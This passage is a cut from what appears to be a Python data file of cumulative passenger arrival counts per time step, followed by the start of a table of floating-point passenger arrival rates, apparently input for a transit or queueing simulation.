44, 19, 17, 10, 0, 129, 95, 73, 73, 85, 57, 53, 42, 48, 37, 18, 8, 0), (147, 151, 109, 127, 97, 57, 55, 45, 52, 21, 18, 10, 0, 152, 103, 83, 85, 97, 62, 58, 45, 51, 42, 18, 9, 0), (157, 170, 116, 137, 107, 62, 60, 52, 58, 24, 19, 10, 0, 166, 113, 94, 90, 113, 66, 65, 54, 54, 48, 20, 9, 0), (172, 181, 131, 144, 117, 66, 68, 57, 62, 26, 21, 11, 0, 177, 127, 102, 99, 121, 73, 72, 58, 61, 50, 21, 10, 0), (187, 189, 144, 162, 127, 72, 77, 63, 69, 28, 26, 12, 0, 187, 145, 111, 106, 132, 82, 79, 61, 68, 54, 23, 11, 0), (197, 208, 150, 176, 139, 80, 85, 76, 78, 31, 29, 15, 0, 199, 151, 120, 115, 142, 89, 89, 64, 74, 57, 23, 11, 0), (204, 230, 162, 188, 148, 84, 93, 76, 82, 36, 31, 17, 0, 217, 160, 137, 124, 156, 101, 94, 70, 82, 60, 26, 12, 0), (222, 235, 174, 203, 157, 86, 103, 80, 89, 38, 36, 17, 0, 232, 173, 151, 138, 172, 110, 106, 76, 84, 68, 27, 14, 0), (244, 250, 186, 219, 168, 96, 106, 84, 97, 43, 38, 19, 0, 243, 186, 164, 144, 188, 117, 116, 80, 86, 72, 29, 15, 0), (259, 262, 194, 234, 177, 101, 113, 88, 103, 46, 40, 19, 0, 260, 201, 178, 152, 196, 122, 122, 83, 91, 74, 30, 15, 0), (273, 276, 205, 249, 192, 110, 118, 96, 109, 49, 42, 20, 0, 272, 217, 188, 156, 214, 132, 129, 86, 95, 79, 33, 15, 0), (291, 299, 217, 266, 210, 115, 124, 100, 114, 53, 42, 21, 0, 290, 231, 193, 167, 224, 143, 137, 90, 98, 85, 39, 15, 0), (301, 314, 229, 285, 224, 119, 128, 106, 120, 57, 47, 25, 0, 309, 248, 200, 180, 235, 151, 141, 92, 103, 92, 42, 15, 0), (314, 333, 243, 304, 235, 124, 137, 113, 125, 59, 50, 25, 0, 324, 263, 206, 189, 246, 159, 144, 92, 108, 99, 44, 15, 0), (328, 342, 252, 315, 248, 128, 142, 118, 133, 60, 52, 28, 0, 339, 280, 215, 197, 261, 174, 151, 95, 112, 103, 45, 15, 0), (346, 360, 272, 323, 259, 139, 148, 125, 135, 64, 53, 29, 0, 355, 300, 228, 208, 282, 183, 158, 98, 120, 107, 46, 15, 0), (370, 374, 287, 335, 271, 145, 159, 130, 142, 67, 58, 29, 0, 371, 318, 236, 218, 297, 189, 162, 102, 127, 110, 49, 17, 0), (385, 388, 298, 350, 286, 151, 161, 135, 149, 71, 60, 30, 0, 388, 329, 253, 230, 309, 195, 169, 103, 130, 113, 52, 19, 0), (395, 403, 316, 367, 302, 156, 166, 140, 157, 74, 63, 31, 0, 405, 348, 264, 240, 317, 205, 184, 105, 133, 119, 56, 21, 0), (409, 412, 337, 380, 314, 166, 170, 150, 163, 77, 65, 33, 0, 426, 356, 274, 255, 328, 208, 192, 108, 138, 120, 61, 22, 0), (422, 426, 348, 405, 329, 170, 178, 154, 169, 79, 67, 33, 0, 438, 374, 287, 268, 340, 215, 200, 110, 145, 123, 64, 24, 0), (438, 444, 363, 420, 343, 176, 181, 159, 181, 81, 70, 34, 0, 453, 386, 298, 278, 352, 225, 204, 116, 150, 129, 64, 26, 0), (458, 463, 381, 433, 352, 181, 187, 166, 185, 83, 72, 34, 0, 483, 407, 312, 290, 363, 232, 209, 124, 156, 133, 64, 28, 0), (479, 481, 391, 443, 363, 187, 193, 167, 189, 87, 74, 35, 0, 508, 425, 320, 301, 372, 239, 212, 126, 159, 138, 66, 28, 0), (497, 497, 408, 461, 377, 194, 200, 175, 196, 91, 75, 35, 0, 524, 439, 336, 308, 381, 247, 223, 129, 166, 142, 68, 32, 0), (518, 509, 420, 478, 386, 201, 206, 177, 203, 98, 76, 37, 0, 541, 454, 343, 315, 398, 253, 230, 132, 173, 147, 70, 32, 0), (533, 519, 429, 489, 395, 205, 216, 182, 209, 99, 77, 39, 0, 548, 471, 357, 324, 407, 257, 236, 139, 180, 157, 74, 34, 0), (543, 540, 448, 508, 408, 209, 223, 188, 212, 101, 79, 41, 0, 567, 485, 363, 332, 418, 262, 244, 139, 184, 162, 78, 36, 0), (563, 556, 470, 519, 424, 218, 233, 194, 217, 108, 80, 42, 0, 584, 494, 373, 341, 431, 271, 253, 142, 189, 167, 81, 37, 0), (578, 569, 484, 536, 436, 224, 241, 201, 221, 110, 82, 43, 0, 601, 508, 389, 352, 446, 273, 259, 147, 197, 171, 85, 39, 0), (595, 579, 507, 552, 447, 227, 254, 204, 225, 111, 84, 47, 0, 617, 524, 397, 367, 462, 284, 265, 155, 199, 176, 89, 39, 0), (607, 589, 513, 562, 457, 235, 264, 211, 229, 116, 85, 48, 0, 632, 545, 405, 381, 478, 295, 272, 158, 207, 181, 93, 39, 0), (628, 603, 528, 582, 467, 244, 270, 215, 235, 122, 87, 49, 0, 643, 564, 414, 391, 495, 302, 280, 160, 212, 188, 96, 40, 0), (651, 617, 540, 589, 476, 251, 276, 220, 237, 126, 87, 50, 0, 666, 582, 426, 402, 511, 311, 286, 165, 216, 193, 98, 44, 0), (667, 632, 557, 601, 481, 257, 280, 222, 241, 128, 87, 53, 0, 687, 601, 437, 414, 527, 320, 291, 170, 220, 198, 99, 44, 0), (679, 646, 576, 615, 492, 261, 289, 227, 249, 135, 88, 54, 0, 706, 615, 449, 421, 542, 322, 295, 176, 229, 201, 102, 47, 0), (688, 660, 587, 627, 502, 264, 295, 233, 255, 136, 93, 55, 0, 721, 629, 461, 431, 555, 326, 304, 179, 238, 202, 102, 48, 0), (709, 673, 596, 641, 523, 269, 300, 236, 266, 138, 97, 59, 0, 733, 644, 475, 441, 572, 333, 314, 183, 243, 208, 102, 49, 0), (721, 689, 612, 656, 535, 277, 309, 243, 272, 141, 99, 62, 0, 743, 661, 486, 446, 583, 346, 318, 186, 247, 214, 106, 50, 0), (735, 707, 624, 674, 545, 283, 317, 245, 277, 143, 102, 65, 0, 760, 673, 492, 453, 606, 351, 321, 193, 253, 221, 109, 50, 0), (755, 725, 634, 688, 554, 285, 322, 251, 283, 146, 105, 67, 0, 782, 689, 497, 458, 619, 359, 325, 201, 260, 225, 110, 51, 0), (770, 738, 639, 703, 568, 289, 332, 259, 289, 150, 107, 67, 0, 800, 698, 509, 470, 631, 370, 331, 206, 264, 227, 113, 51, 0), (789, 754, 651, 720, 575, 295, 342, 263, 293, 155, 109, 68, 0, 813, 716, 520, 477, 648, 382, 338, 207, 271, 233, 115, 53, 0), (800, 771, 671, 729, 584, 302, 347, 265, 299, 156, 111, 69, 0, 828, 736, 536, 486, 659, 388, 345, 209, 276, 240, 116, 53, 0), (816, 784, 686, 745, 595, 309, 353, 272, 301, 159, 116, 70, 0, 841, 748, 543, 499, 670, 395, 351, 213, 277, 251, 117, 54, 0), (835, 805, 705, 762, 604, 316, 357, 278, 308, 159, 116, 73, 0, 858, 758, 554, 505, 689, 400, 357, 218, 284, 258, 118, 56, 0), (856, 819, 718, 779, 616, 321, 365, 287, 314, 160, 117, 74, 0, 878, 765, 561, 513, 701, 407, 366, 220, 292, 266, 121, 57, 0), (873, 833, 729, 796, 623, 324, 373, 290, 320, 162, 121, 74, 0, 898, 782, 571, 520, 707, 415, 373, 226, 298, 272, 123, 60, 0), (886, 849, 738, 803, 641, 331, 379, 299, 329, 165, 123, 76, 0, 915, 794, 586, 534, 714, 421, 379, 234, 303, 277, 126, 63, 0), (906, 863, 748, 820, 654, 338, 386, 303, 337, 170, 125, 77, 0, 935, 810, 593, 544, 726, 425, 385, 238, 309, 281, 130, 65, 0), (927, 875, 763, 833, 667, 347, 398, 309, 344, 173, 127, 79, 0, 949, 822, 605, 550, 739, 433, 387, 245, 317, 287, 131, 65, 0), (947, 889, 780, 846, 682, 352, 401, 316, 350, 177, 128, 81, 0, 958, 832, 618, 556, 749, 437, 396, 249, 326, 294, 134, 67, 0), (954, 907, 795, 858, 699, 358, 406, 320, 355, 181, 128, 81, 0, 970, 847, 631, 568, 768, 443, 401, 254, 335, 295, 135, 69, 0), (975, 921, 809, 875, 714, 363, 418, 324, 365, 183, 132, 81, 0, 986, 859, 637, 579, 782, 445, 409, 259, 344, 303, 141, 72, 0), (1001, 938, 827, 895, 721, 371, 428, 329, 373, 185, 132, 83, 0, 1006, 878, 643, 588, 791, 453, 413, 263, 350, 306, 144, 75, 0), (1020, 952, 842, 916, 731, 379, 433, 331, 381, 189, 134, 84, 0, 1021, 896, 656, 597, 802, 460, 421, 264, 353, 311, 145, 76, 0), (1039, 968, 852, 931, 739, 383, 440, 337, 389, 192, 136, 85, 0, 1051, 909, 664, 606, 812, 473, 425, 269, 357, 315, 151, 77, 0), (1048, 977, 865, 952, 752, 394, 445, 340, 393, 193, 138, 87, 0, 1064, 928, 678, 613, 825, 481, 429, 272, 365, 318, 153, 79, 0), (1057, 992, 877, 975, 764, 396, 450, 352, 402, 197, 139, 88, 0, 1078, 940, 687, 621, 837, 489, 432, 276, 365, 323, 156, 80, 0), (1073, 1006, 886, 988, 780, 402, 456, 356, 407, 203, 141, 89, 0, 1088, 952, 693, 629, 841, 494, 436, 280, 370, 324, 156, 80, 0), (1085, 1028, 903, 995, 796, 409, 460, 359, 414, 205, 144, 90, 0, 1101, 968, 707, 632, 853, 500, 441, 286, 374, 332, 159, 84, 0), (1101, 1039, 916, 1010, 808, 412, 466, 364, 420, 209, 146, 90, 0, 1114, 977, 712, 640, 865, 504, 446, 291, 381, 338, 161, 84, 0), (1114, 1052, 933, 1025, 818, 416, 473, 367, 424, 209, 149, 90, 0, 1129, 988, 719, 649, 874, 508, 451, 295, 388, 346, 163, 85, 0), (1130, 1069, 945, 1045, 840, 422, 484, 371, 430, 214, 152, 90, 0, 1148, 997, 727, 660, 890, 512, 459, 302, 393, 350, 166, 85, 0), (1147, 1075, 959, 1056, 850, 432, 490, 377, 436, 215, 155, 92, 0, 1169, 1007, 740, 671, 901, 518, 465, 303, 400, 354, 168, 89, 0), (1159, 1085, 972, 1077, 863, 438, 498, 385, 448, 217, 157, 92, 0, 1184, 1019, 745, 675, 915, 524, 470, 305, 408, 360, 170, 92, 0), (1178, 1097, 989, 1093, 876, 445, 505, 395, 455, 221, 157, 93, 0, 1196, 1034, 753, 680, 931, 529, 472, 307, 416, 361, 170, 93, 0), (1196, 1107, 1004, 1105, 884, 448, 511, 397, 459, 223, 159, 94, 0, 1216, 1042, 765, 687, 941, 533, 478, 313, 425, 363, 172, 96, 0), (1204, 1115, 1017, 1121, 898, 452, 518, 400, 461, 225, 163, 94, 0, 1229, 1052, 776, 694, 960, 537, 488, 319, 431, 364, 176, 97, 0), (1219, 1128, 1029, 1132, 909, 455, 520, 404, 466, 232, 165, 95, 0, 1241, 1068, 779, 703, 975, 544, 492, 327, 442, 368, 182, 98, 0), (1235, 1143, 1047, 1148, 918, 457, 527, 408, 476, 239, 166, 95, 0, 1257, 1084, 791, 709, 993, 549, 495, 330, 448, 372, 186, 98, 0), (1250, 1159, 1051, 1167, 928, 462, 531, 412, 481, 243, 169, 98, 0, 1278, 1095, 803, 716, 1001, 551, 500, 332, 450, 379, 188, 100, 0), (1271, 1170, 1065, 1182, 943, 470, 537, 417, 484, 246, 171, 100, 0, 1297, 1105, 809, 723, 1009, 557, 501, 338, 453, 381, 194, 101, 0), (1282, 1186, 1073, 1196, 952, 475, 540, 421, 487, 248, 171, 101, 0, 1314, 1114, 822, 730, 1021, 564, 506, 347, 461, 388, 197, 101, 0), (1295, 1206, 1086, 1209, 968, 478, 543, 426, 498, 252, 171, 105, 0, 1339, 1126, 832, 745, 1037, 570, 510, 353, 465, 393, 199, 102, 0), (1309, 1214, 1099, 1221, 981, 482, 546, 428, 502, 254, 173, 106, 0, 1351, 1142, 844, 754, 1056, 577, 517, 359, 472, 397, 200, 102, 0), (1325, 1232, 1111, 1241, 993, 487, 551, 429, 510, 255, 174, 107, 0, 1370, 1161, 853, 760, 1067, 589, 521, 361, 480, 401, 202, 104, 0), (1350, 1251, 1124, 1257, 1003, 491, 558, 431, 512, 256, 175, 107, 0, 1396, 1175, 863, 770, 1081, 598, 524, 367, 488, 405, 203, 107, 0), (1367, 1263, 1132, 1273, 1014, 497, 563, 437, 518, 260, 177, 107, 0, 1409, 1195, 875, 779, 1092, 609, 534, 369, 496, 410, 204, 110, 0), (1377, 1273, 1142, 1288, 1022, 507, 575, 441, 526, 263, 182, 107, 0, 1427, 1208, 889, 785, 1104, 613, 547, 372, 502, 411, 208, 113, 0), (1389, 1282, 1156, 1299, 1038, 515, 580, 444, 534, 263, 184, 108, 0, 1436, 1217, 902, 793, 1116, 619, 550, 377, 507, 418, 208, 113, 0), (1407, 1293, 1166, 1312, 1048, 518, 585, 448, 539, 264, 187, 109, 0, 1460, 1228, 915, 800, 1126, 622, 555, 379, 512, 423, 211, 114, 0), (1424, 1309, 1177, 1329, 1064, 526, 591, 450, 542, 268, 187, 111, 0, 1481, 1241, 931, 809, 1140, 626, 559, 384, 516, 428, 213, 114, 0), (1438, 1323, 1183, 1345, 1071, 534, 602, 459, 550, 270, 191, 111, 0, 1498, 1254, 941, 815, 1153, 634, 564, 388, 521, 433, 216, 114, 0), (1460, 1331, 1191, 1357, 1080, 537, 602, 459, 553, 272, 192, 113, 0, 1513, 1266, 944, 826, 1162, 637, 571, 395, 529, 445, 219, 115, 0), (1478, 1338, 1205, 1366, 1087, 543, 609, 461, 560, 276, 195, 115, 0, 1530, 1286, 952, 832, 1173, 642, 572, 399, 541, 451, 223, 116, 0), (1496, 1348, 1214, 1378, 1097, 551, 618, 465, 564, 279, 200, 117, 0, 1554, 1301, 957, 842, 1185, 653, 577, 404, 549, 457, 225, 117, 0), (1511, 1358, 1225, 1394, 1108, 554, 623, 469, 567, 281, 203, 120, 0, 1567, 1312, 969, 850, 1197, 658, 581, 404, 559, 459, 228, 118, 0), (1533, 1367, 1235, 1403, 1120, 560, 630, 475, 573, 284, 204, 120, 0, 1582, 1332, 982, 859, 1207, 665, 587, 408, 567, 467, 231, 119, 0), (1548, 1384, 1244, 1416, 1128, 566, 636, 475, 577, 284, 206, 122, 0, 1600, 1347, 987, 870, 1221, 671, 594, 414, 571, 472, 232, 121, 0), (1564, 1398, 1256, 1427, 1138, 570, 642, 478, 582, 287, 208, 122, 0, 1613, 1359, 995, 878, 1233, 676, 598, 416, 576, 478, 239, 124, 0), (1578, 1405, 1269, 1443, 1149, 575, 645, 478, 589, 290, 210, 124, 0, 1632, 1367, 1004, 884, 1248, 684, 605, 421, 582, 481, 239, 126, 0), (1596, 1418, 1282, 1464, 1165, 586, 648, 483, 595, 293, 210, 126, 0, 1647, 1380, 1014, 893, 1263, 690, 610, 423, 587, 491, 241, 128, 0), (1611, 1431, 1294, 1480, 1175, 589, 654, 485, 601, 295, 210, 126, 0, 1660, 1390, 1029, 903, 1277, 702, 614, 426, 590, 494, 243, 129, 0), (1626, 1437, 1315, 1492, 1194, 595, 661, 489, 607, 296, 212, 129, 0, 1671, 1396, 1040, 910, 1291, 704, 622, 429, 594, 502, 246, 131, 0), (1644, 1450, 1327, 1507, 1207, 601, 663, 498, 615, 298, 217, 130, 0, 1686, 1416, 1050, 917, 1300, 709, 627, 432, 599, 505, 248, 132, 0), (1657, 1464, 1336, 1521, 1212, 613, 668, 501, 620, 301, 219, 130, 0, 1700, 1427, 1058, 919, 1313, 717, 634, 432, 603, 510, 248, 134, 0), (1672, 1477, 1351, 1536, 1228, 617, 671, 506, 625, 305, 219, 131, 0, 1715, 1441, 1073, 922, 1326, 722, 638, 436, 609, 512, 251, 135, 0), (1683, 1489, 1368, 1545, 1237, 621, 679, 515, 634, 308, 223, 132, 0, 1734, 1456, 1081, 929, 1334, 727, 642, 440, 610, 518, 253, 136, 0), (1696, 1503, 1385, 1555, 1249, 623, 684, 523, 639, 309, 223, 134, 0, 1747, 1472, 1088, 938, 1340, 732, 648, 445, 619, 523, 254, 136, 0), (1711, 1516, 1396, 1563, 1264, 626, 688, 529, 645, 311, 224, 134, 0, 1764, 1483, 1090, 942, 1348, 738, 652, 448, 623, 525, 254, 137, 0), (1724, 1527, 1407, 1578, 1282, 628, 696, 531, 647, 313, 227, 135, 0, 1777, 1497, 1100, 951, 1356, 744, 654, 456, 634, 533, 254, 139, 0), (1742, 1537, 1421, 1588, 1293, 634, 702, 534, 653, 315, 228, 136, 0, 1793, 1514, 1109, 958, 1369, 747, 659, 462, 639, 537, 256, 140, 0), (1753, 1545, 1433, 1597, 1297, 636, 705, 543, 654, 318, 233, 139, 0, 1808, 1523, 1116, 965, 1379, 753, 668, 470, 645, 539, 257, 140, 0), (1767, 1554, 1447, 1615, 1306, 639, 707, 547, 660, 323, 234, 141, 0, 1824, 1540, 1126, 974, 1390, 758, 672, 472, 655, 541, 261, 142, 0), (1775, 1559, 1462, 1627, 1318, 646, 713, 552, 665, 330, 236, 141, 0, 1839, 1552, 1134, 984, 1405, 762, 674, 474, 662, 546, 264, 144, 0), (1787, 1566, 1474, 1643, 1327, 654, 716, 557, 668, 335, 238, 142, 0, 1850, 1564, 1152, 991, 1418, 768, 681, 478, 667, 549, 265, 145, 0), (1802, 1575, 1484, 1657, 1340, 659, 726, 563, 672, 336, 240, 144, 0, 1859, 1574, 1163, 996, 1432, 772, 684, 484, 671, 552, 270, 146, 0), (1814, 1582, 1499, 1667, 1350, 666, 732, 569, 676, 339, 243, 145, 0, 1869, 1589, 1173, 1007, 1445, 777, 688, 489, 679, 558, 278, 146, 0), (1830, 1590, 1507, 1685, 1360, 671, 733, 574, 684, 341, 246, 145, 0, 1880, 1605, 1182, 1015, 1457, 783, 691, 491, 682, 564, 279, 146, 0), (1843, 1609, 1517, 1695, 1369, 676, 738, 578, 691, 345, 247, 146, 0, 1891, 1618, 1191, 1021, 1471, 787, 694, 493, 687, 568, 279, 147, 0), (1858, 1620, 1526, 1710, 1381, 682, 741, 582, 697, 349, 250, 147, 0, 1905, 1625, 1198, 1026, 1482, 797, 699, 497, 691, 571, 279, 148, 0), (1872, 1629, 1539, 1721, 1385, 687, 744, 588, 706, 351, 256, 147, 0, 1926, 1637, 1203, 1033, 1497, 804, 705, 503, 696, 574, 284, 149, 0), (1884, 1641, 1550, 1736, 1395, 695, 747, 592, 709, 353, 257, 149, 0, 1943, 1646, 1217, 1040, 1507, 809, 709, 504, 704, 576, 286, 150, 0), (1898, 1652, 1558, 1748, 1410, 699, 750, 600, 712, 355, 259, 149, 0, 1959, 1656, 1233, 1053, 1514, 811, 711, 505, 710, 581, 287, 150, 0), (1913, 1663, 1565, 1759, 1420, 703, 757, 603, 715, 357, 261, 150, 0, 1973, 1666, 1242, 1056, 1524, 815, 719, 513, 715, 584, 291, 150, 0), (1930, 1673, 1578, 1771, 1428, 709, 760, 605, 725, 362, 262, 150, 0, 1981, 1675, 1250, 1062, 1540, 820, 722, 516, 720, 588, 293, 150, 0), (1947, 1681, 1593, 1787, 1441, 714, 763, 609, 730, 362, 263, 151, 0, 1999, 1687, 1263, 1070, 1549, 823, 725, 521, 725, 595, 296, 150, 0), (1965, 1692, 1614, 1795, 1449, 718, 771, 612, 740, 367, 263, 152, 0, 2010, 1698, 1267, 1074, 1559, 832, 729, 524, 728, 597, 297, 152, 0), (1981, 1705, 1623, 1812, 1461, 722, 774, 615, 745, 369, 264, 152, 0, 2029, 1707, 1276, 1082, 1566, 836, 731, 525, 736, 603, 299, 153, 0), (1993, 1715, 1633, 1823, 1472, 726, 778, 619, 753, 370, 264, 152, 0, 2047, 1717, 1281, 1088, 1578, 843, 737, 529, 745, 609, 301, 155, 0), (2005, 1722, 1647, 1834, 1482, 730, 782, 623, 755, 371, 265, 153, 0, 2055, 1727, 1288, 1095, 1591, 848, 739, 533, 750, 612, 305, 157, 0), (2020, 1733, 1654, 1850, 1488, 732, 785, 626, 762, 371, 269, 155, 0, 2075, 1737, 1297, 1104, 1603, 860, 748, 536, 751, 615, 307, 158, 0), (2035, 1744, 1670, 1869, 1497, 738, 788, 628, 766, 373, 270, 155, 0, 2091, 1755, 1308, 1108, 1616, 868, 749, 542, 757, 621, 308, 158, 0), (2053, 1752, 1678, 1882, 1506, 746, 799, 631, 769, 375, 272, 157, 0, 2104, 1767, 1322, 1113, 1628, 872, 751, 549, 764, 623, 308, 159, 0), (2063, 1771, 1692, 1892, 1517, 749, 799, 636, 773, 377, 274, 157, 0, 2118, 1774, 1330, 1118, 1644, 875, 758, 553, 769, 628, 309, 161, 0), (2076, 1786, 1704, 1898, 1527, 756, 803, 639, 778, 377, 277, 157, 0, 2133, 1788, 1339, 1122, 1654, 886, 767, 559, 774, 634, 310, 162, 0), (2094, 1795, 1717, 1904, 1535, 759, 807, 643, 784, 377, 279, 159, 0, 2151, 1795, 1345, 1128, 1662, 891, 770, 562, 781, 638, 313, 163, 0), (2105, 1807, 1736, 1914, 1545, 765, 810, 650, 787, 378, 283, 159, 0, 2166, 1807, 1353, 1131, 1672, 896, 773, 565, 791, 640, 314, 163, 0), (2125, 1817, 1751, 1925, 1559, 767, 813, 656, 794, 379, 287, 161, 0, 2176, 1818, 1361, 1141, 1683, 898, 782, 570, 796, 650, 316, 165, 0), (2142, 1828, 1757, 1935, 1566, 774, 815, 662, 805, 381, 288, 161, 0, 2189, 1826, 1372, 1146, 1695, 900, 787, 571, 798, 652, 317, 168, 0), (2158, 1840, 1770, 1947, 1573, 779, 817, 668, 813, 382, 288, 163, 0, 2202, 1838, 1379, 1156, 1704, 903, 792, 574, 803, 655, 320, 169, 0), (2171, 1850, 1780, 1953, 1586, 783, 820, 672, 815, 387, 289, 164, 0, 2215, 1849, 1380, 1162, 1719, 914, 794, 576, 810, 657, 323, 171, 0), (2184, 1856, 1793, 1975, 1595, 787, 825, 674, 821, 389, 290, 165, 0, 2227, 1856, 1389, 1173, 1726, 916, 800, 579, 814, 666, 325, 171, 0), (2194, 1863, 1802, 1984, 1607, 791, 830, 680, 826, 392, 292, 165, 0, 2241, 1867, 1400, 1183, 1734, 920, 806, 583, 819, 667, 326, 173, 0), (2209, 1871, 1814, 2003, 1618, 795, 832, 685, 832, 398, 294, 166, 0, 2253, 1879, 1410, 1189, 1742, 927, 809, 589, 830, 671, 328, 173, 0), (2225, 1881, 1826, 2013, 1625, 800, 835, 689, 833, 398, 295, 168, 0, 2272, 1887, 1419, 1197, 1752, 932, 812, 592, 841, 674, 331, 174, 0), (2236, 1894, 1843, 2021, 1633, 806, 839, 693, 843, 403, 295, 170, 0, 2285, 1898, 1428, 1202, 1760, 938, 814, 595, 855, 680, 332, 177, 0), (2250, 1907, 1853, 2033, 1639, 813, 841, 697, 846, 406, 295, 172, 0, 2298, 1908, 1440, 1207, 1767, 941, 816, 598, 860, 681, 332, 178, 0), (2260, 1913, 1864, 2042, 1649, 821, 843, 701, 849, 406, 297, 173, 0, 2313, 1920, 1447, 1216, 1779, 944, 817, 599, 865, 685, 337, 178, 0), (2274, 1922, 1872, 2058, 1662, 824, 845, 704, 855, 408, 299, 174, 0, 2334, 1935, 1454, 1223, 1795, 946, 823, 604, 867, 687, 337, 179, 0), (2285, 1934, 1883, 2070, 1669, 826, 853, 710, 855, 411, 299, 175, 0, 2345, 1943, 1459, 1234, 1808, 950, 826, 609, 872, 691, 339, 180, 0), (2295, 1946, 1894, 2085, 1687, 828, 858, 712, 863, 413, 300, 177, 0, 2362, 1956, 1463, 1238, 1821, 956, 830, 610, 875, 699, 340, 181, 0), (2306, 1958, 1904, 2093, 1691, 834, 860, 721, 867, 417, 300, 177, 0, 2377, 1966, 1471, 1240, 1828, 962, 833, 610, 876, 701, 343, 183, 0), (2321, 1967, 1916, 2105, 1699, 842, 864, 726, 876, 418, 301, 179, 0, 2393, 1975, 1477, 1244, 1840, 969, 836, 615, 883, 706, 346, 183, 0), (2330, 1981, 1926, 2118, 1709, 849, 866, 732, 883, 419, 302, 180, 0, 2405, 1985, 1480, 1253, 1851, 973, 841, 617, 886, 711, 349, 183, 0), (2344, 1991, 1938, 2130, 1717, 856, 866, 735, 886, 423, 304, 181, 0, 2425, 2001, 1488, 1258, 1855, 974, 845, 623, 895, 716, 351, 183, 0), (2365, 1997, 1949, 2150, 1729, 858, 871, 737, 891, 424, 304, 182, 0, 2439, 2008, 1495, 1265, 1864, 982, 851, 626, 899, 722, 353, 183, 0), (2371, 2006, 1962, 2161, 1735, 862, 876, 740, 895, 428, 305, 183, 0, 2451, 2020, 1504, 1267, 1877, 987, 856, 629, 900, 727, 354, 184, 0), (2376, 2014, 1976, 2164, 1740, 866, 877, 742, 900, 428, 307, 184, 0, 2468, 2028, 1512, 1273, 1883, 992, 862, 631, 905, 730, 357, 186, 0), (2384, 2027, 1987, 2176, 1748, 870, 880, 750, 904, 428, 308, 185, 0, 2478, 2038, 1518, 1274, 1892, 996, 863, 632, 911, 733, 358, 186, 0), (2393, 2033, 2005, 2188, 1758, 876, 886, 752, 907, 429, 309, 186, 0, 2489, 2047, 1530, 1277, 1905, 1003, 867, 636, 916, 738, 360, 187, 0), (2404, 2041, 2011, 2195, 1768, 877, 889, 759, 913, 432, 309, 187, 0, 2497, 2062, 1536, 1286, 1921, 1008, 868, 638, 921, 741, 361, 187, 0), (2417, 2047, 2017, 2202, 1779, 886, 891, 761, 917, 432, 310, 187, 0, 2510, 2071, 1544, 1290, 1932, 1009, 870, 639, 924, 744, 364, 189, 0), (2425, 2052, 2033, 2215, 1787, 894, 894, 761, 921, 432, 310, 189, 0, 2522, 2083, 1552, 1297, 1942, 1017, 876, 642, 932, 746, 366, 189, 0), (2439, 2058, 2039, 2222, 1795, 898, 896, 762, 925, 434, 310, 191, 0, 2532, 2090, 1559, 1301, 1949, 1024, 879, 646, 935, 751, 367, 189, 0), (2443, 2071, 2052, 2232, 1809, 902, 901, 764, 930, 439, 312, 191, 0, 2547, 2093, 1571, 1303, 1965, 1029, 882, 649, 936, 754, 368, 190, 0), (2452, 2079, 2066, 2244, 1812, 904, 902, 768, 935, 442, 312, 193, 0, 2557, 2103, 1580, 1308, 1977, 1029, 886, 654, 944, 758, 368, 190, 0), (2470, 2085, 2076, 2252, 1820, 910, 903, 772, 942, 445, 312, 195, 0, 2568, 2114, 1589, 1313, 1983, 1036, 887, 655, 949, 760, 369, 190, 0), (2479, 2095, 2090, 2255, 1825, 915, 906, 776, 946, 446, 313, 197, 0, 2576, 2118, 1597, 1316, 1989, 1041, 889, 657, 953, 764, 372, 191, 0), (2487, 2106, 2100, 2261, 1833, 915, 910, 780, 952, 449, 313, 199, 0, 2589, 2123, 1604, 1319, 1990, 1048, 892, 660, 961, 766, 373, 193, 0), (2497, 2109, 2113, 2269, 1838, 920, 915, 784, 956, 450, 317, 200, 0, 2602, 2133, 1608, 1321, 1999, 1051, 892, 662, 968, 769, 378, 194, 0), (2512, 2112, 2120, 2276, 1844, 924, 916, 786, 958, 451, 318, 201, 0, 2611, 2141, 1613, 1328, 2006, 1051, 893, 664, 972, 771, 380, 196, 0), (2522, 2114, 2130, 2285, 1851, 929, 918, 791, 962, 451, 318, 201, 0, 2621, 2148, 1618, 1330, 2016, 1052, 896, 669, 977, 774, 380, 196, 0), (2529, 2117, 2136, 2292, 1857, 931, 921, 797, 967, 453, 319, 201, 0, 2629, 2152, 1625, 1339, 2023, 1054, 899, 672, 981, 779, 381, 196, 0), (2532, 2122, 2146, 2299, 1861, 934, 925, 800, 968, 454, 319, 201, 0, 2639, 2158, 1632, 1343, 2030, 1058, 899, 673, 982, 783, 382, 196, 0), (2541, 2126, 2153, 2304, 1868, 935, 928, 803, 971, 457, 319, 201, 0, 2644, 2169, 1637, 1346, 2034, 1060, 901, 677, 985, 786, 383, 196, 0), (2547, 2129, 2157, 2316, 1872, 939, 930, 805, 972, 457, 320, 201, 0, 2651, 2176, 1642, 1347, 2048, 1061, 905, 679, 987, 788, 384, 196, 0), (2553, 2131, 2165, 2319, 1877, 941, 932, 807, 976, 457, 322, 201, 0, 2659, 2181, 1643, 1350, 2054, 1064, 908, 682, 989, 790, 387, 197, 0), (2553, 2131, 2165, 2319, 1877, 941, 932, 807, 976, 457, 322, 201, 0, 2659, 2181, 1643, 1350, 2054, 1064, 908, 682, 989, 790, 387, 197, 0))
passenger_arriving_rate = ((8.033384925394829, 8.103756554216645, 6.9483776394833425, 7.45760132863612, 5.924997981450252, 2.9294112699015167, 3.3168284922991322, 3.102117448652949, 3.2480528331562706, 1.5832060062089484, 1.1214040437028276, 0.6530553437741565, 0.0, 8.134208340125381, 7.183608781515721, 5.607020218514138, 4.749618018626844, 6.496105666312541, 4.342964428114128, 3.3168284922991322, 2.0924366213582264, 2.962498990725126, 2.4858671095453735, 1.3896755278966686, 0.7367051412924223, 0.0), (8.566923443231959, 8.638755684745645, 7.407128788440204, 7.95017310393194, 6.317323026639185, 3.122918011773052, 3.535575153010955, 3.306342481937139, 3.462530840710885, 1.6875922769108604, 1.1954923029216353, 0.6961622214419141, 0.0, 8.671666635903767, 7.657784435861053, 5.9774615146081755, 5.06277683073258, 6.92506168142177, 4.628879474711995, 3.535575153010955, 2.230655722695037, 3.1586615133195926, 2.650057701310647, 1.4814257576880407, 0.7853414258859679, 0.0), (9.09875681436757, 9.171631583973436, 7.864056380729885, 8.440785245597754, 6.708227171999727, 3.3156527735449486, 3.7534548063685635, 3.5097501652696135, 3.676152963668026, 1.7915655100082188, 1.269286173007017, 0.7390976869404075, 0.0, 9.206983725135505, 8.13007455634448, 6.346430865035084, 5.374696530024655, 7.352305927336052, 4.913650231377459, 3.7534548063685635, 2.3683234096749635, 3.3541135859998636, 2.8135950818659183, 1.5728112761459772, 0.8337846894521307, 0.0), (9.6268124690345, 9.70027006950679, 8.317347825759807, 